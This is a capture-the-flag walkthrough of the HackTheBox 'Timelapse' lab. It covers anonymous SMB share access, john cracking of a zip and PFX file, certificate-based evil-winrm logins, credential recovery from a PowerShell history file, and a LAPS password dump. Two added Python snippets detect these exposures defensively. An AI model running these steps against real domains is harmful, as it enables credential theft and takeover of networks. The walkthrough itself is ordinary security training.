HackTheBox - Timelapse
Configuration
It is useful to add the machine's IP address to /etc/hosts: it lets us resolve subdomains and saves retyping the address every time.
$ echo '10.10.11.152 timelapse.htb' | sudo tee -a /etc/hosts
Reconnaissance
$ nmap -p- timelapse.htb -Pn
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 11:10 UTC
Nmap scan report for timelapse.htb (10.10.11.152)
Host is up (0.056s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
62020/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 111.03 seconds
The combination of Kerberos (88), LDAP (389/636), global catalog (3268/3269), SMB (445) and WinRM over HTTPS (5986) tells us this is an Active Directory domain controller.
Enumeration
Let's start with SMB enumeration. It can also be done with plain smbclient.
$ crackmapexec smb timelapse.htb -u 'a' -p '' --shares
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [+] timelapse.htb\a:
SMB timelapse.htb 445 DC01 [+] Enumerated shares
SMB timelapse.htb 445 DC01 Share Permissions Remark
SMB timelapse.htb 445 DC01 ----- ----------- ------
SMB timelapse.htb 445 DC01 ADMIN$ Remote Admin
SMB timelapse.htb 445 DC01 C$ Default share
SMB timelapse.htb 445 DC01 IPC$ READ Remote IPC
SMB timelapse.htb 445 DC01 NETLOGON Logon server share
SMB timelapse.htb 445 DC01 Shares READ
SMB timelapse.htb 445 DC01 SYSVOL Logon server share
Two shares (IPC$ and Shares) are readable without any credentials, so we connect with smbclient and look around.
$ smbclient -N \\\\timelapse.htb\\Shares\\
smb: \> dir
. D 0 Mon Oct 25 15:39:15 2021
.. D 0 Mon Oct 25 15:39:15 2021
Dev D 0 Mon Oct 25 19:40:06 2021
HelpDesk D 0 Mon Oct 25 15:48:42 2021
6367231 blocks of size 4096. 1680031 blocks available
smb: \> cd Dev
smb: \Dev\> dir
. D 0 Mon Oct 25 19:40:06 2021
.. D 0 Mon Oct 25 19:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021
6367231 blocks of size 4096. 1680031 blocks available
smb: \Dev\> get winrm_backup.zip
smb: \Dev\> cd ..
smb: \> cd HelpDesk
smb: \HelpDesk\> dir
. D 0 Mon Oct 25 15:48:42 2021
.. D 0 Mon Oct 25 15:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44 2021
6367231 blocks of size 4096. 1680031 blocks available
smb: \HelpDesk\> mget *
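From the defender's side, the share listing above is the finding: a share other than IPC$ that a null session can read. The following parser is an added example (not from the original write-up); it reads crackmapexec --shares output, detects whether the scan authenticated with an empty password, and lists the shares such a session could open. The sample output is a constructed copy of the listing above.

```python
import re

# Constructed copy of the crackmapexec --shares output shown in the write-up.
SAMPLE_CME_OUTPUT = """\
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [+] timelapse.htb\\a:
SMB timelapse.htb 445 DC01 [+] Enumerated shares
SMB timelapse.htb 445 DC01 Share Permissions Remark
SMB timelapse.htb 445 DC01 ----- ----------- ------
SMB timelapse.htb 445 DC01 ADMIN$ Remote Admin
SMB timelapse.htb 445 DC01 C$ Default share
SMB timelapse.htb 445 DC01 IPC$ READ Remote IPC
SMB timelapse.htb 445 DC01 NETLOGON Logon server share
SMB timelapse.htb 445 DC01 Shares READ
SMB timelapse.htb 445 DC01 SYSVOL Logon server share
"""

# "SMB <host> <port> <name> <rest>" prefix on every line, and the login
# result line "[+] DOMAIN\user:password" (empty password = null session).
PREFIX = re.compile(r"^SMB\s+\S+\s+\d+\s+\S+\s+(?P<rest>.*)$")
LOGIN = re.compile(r"^\[\+\]\s+[^\\]+\\[^:]*:(?P<password>.*)$")
PERMS = {"READ", "WRITE"}

def parse_shares(output):
    """Return (null_session, [(share, perms, remark), ...])."""
    null_session, shares, in_table = False, [], False
    for line in output.splitlines():
        m = PREFIX.match(line)
        if not m:
            continue
        rest = m.group("rest").strip()
        login = LOGIN.match(rest)
        if login:                       # credentials the scan authenticated with
            null_session = login.group("password") == ""
        elif rest.startswith("-----"):  # table separator: share rows follow
            in_table = True
        elif in_table and rest:
            name, *tail = rest.split()
            perms = set()
            if tail and set(tail[0].split(",")) <= PERMS:
                perms, tail = set(tail[0].split(",")), tail[1:]
            shares.append((name, perms, " ".join(tail)))
    return null_session, shares

def anonymous_readable(output):
    """Shares a null session could open, excluding the expected IPC$ pipe share."""
    null_session, shares = parse_shares(output)
    return [n for n, p, _ in shares if p and n != "IPC$"] if null_session else []
```

Running anonymous_readable over the sample returns ['Shares'], which is exactly the share that should not be reachable without authentication.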
The winrm_backup.zip archive is password-protected, so we try to brute-force it with john.
$ zip2john winrm_backup.zip > hash
$ john --wordlist=rockyou.txt hash
-- EDITED -- (winrm_backup.zip/legacyy_dev_auth.pfx)
legacyy_dev_auth.pfx is a PKCS#12 file: it bundles the certificate (with its public key) and the corresponding private key. A password is required to extract them, so we convert the file to a hash and brute-force it again!
$ pfx2john legacyy_dev_auth.pfx > hash
$ john --wordlist=rockyou.txt hash
-- EDITED -- (legacyy_dev_auth.pfx)
Now that we have the password, we can extract the certificate and the private key with openssl.
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out certificate.crt
user.txt
With the certificate and private key in hand, we can authenticate to the machine over WinRM (certificate-based authentication on port 5986) with evil-winrm.
$ evil-winrm -i timelapse.htb -S -k private.key -c certificate.crt
*Evil-WinRM* PS C:\Users\legacyy\Documents>
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> type Desktop\user.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # Edited
root.txt
Here we have to search. Looking in the Program Files folder, we note that LAPS is installed and enabled. We can upload and run winPEAS, which points us to a PowerShell command history file. Let's open it!
*Evil-WinRM* PS C:\Users\legacyy\Downloads> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString '-- EDITED --' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
We can see the credentials here: svc_deploy:-- EDITED --.
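The history file above is the same artefact a defender should audit: PSReadLine records every interactive command, so a password typed into ConvertTo-SecureString or a PSCredential constructor lands on disk in plaintext. The scanner below is an added example (not from the original write-up) that runs over a constructed copy of that history, with a placeholder in place of the real password, and reports each leaking line with the secret masked.

```python
import re
from dataclasses import dataclass

# Constructed copy of the PSReadLine history found on the box; the real
# password is replaced by a placeholder.
SAMPLE_HISTORY = """whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'PLACEHOLDER_PASSWORD' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
"""

# Ways a secret ends up typed on the command line (and so in the history):
# a plaintext string converted to a SecureString, a PSCredential built from
# a literal user name, or an explicit -Password argument with a literal value.
PATTERNS = {
    "plaintext_securestring": re.compile(
        r"ConvertTo-SecureString\s+(['\"])(?P<secret>.*?)\1.*-AsPlainText", re.I),
    "pscredential_literal": re.compile(
        r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I),
    "password_argument": re.compile(
        r"-password\s+(['\"]?)(?P<secret>[^'\"\s$][^'\"\s]*)\1", re.I),
}

@dataclass
class Finding:
    line_no: int
    kind: str
    redacted: str   # the offending command with the secret masked

def scan_history(text):
    """Flag history lines that embed credentials, masking the secret itself."""
    findings = []
    for no, line in enumerate(text.splitlines(), start=1):
        for kind, pat in PATTERNS.items():
            m = pat.search(line)
            if m:
                secret = m.groupdict().get("secret")
                shown = line.replace(secret, "<redacted>") if secret else line
                findings.append(Finding(no, kind, shown))
    return findings

# On a real host the file lives under
# %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
def scan_file(path):
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_history(fh.read())
```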
The svc_deploy user is a member of the LAPS_Readers group, which is allowed to read the LAPS-managed local Administrator password. We use crackmapexec to do that.
$ crackmapexec smb timelapse.htb -u 'svc_deploy' -p '-- EDITED --' --laps
SMB timelapse.htb 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB timelapse.htb 445 DC01 [-] DC01\administrator:-- EDITED -- STATUS_LOGON_FAILURE
Then we got it: administrator:-- EDITED --. It's time to log in and get the flag!
$ evil-winrm -i timelapse.htb -u 'administrator' -p '-- EDITED --' -S
*Evil-WinRM* PS C:\Users\Administrator\Documents> gci -Path C:\ -Recurse -Include 'root.txt'
Directory: C:\Users\TRX\Desktop
-ar--- 7/1/2022 9:25 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../../TRX/Desktop/root.txt
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX # Edited
It was in an unusual location, so we had to search for it with Get-ChildItem.
Conclusion
I’ve really enjoyed the box. It was interesting to learn some new things.
Thank you for reading, I hope it was useful for you ❤️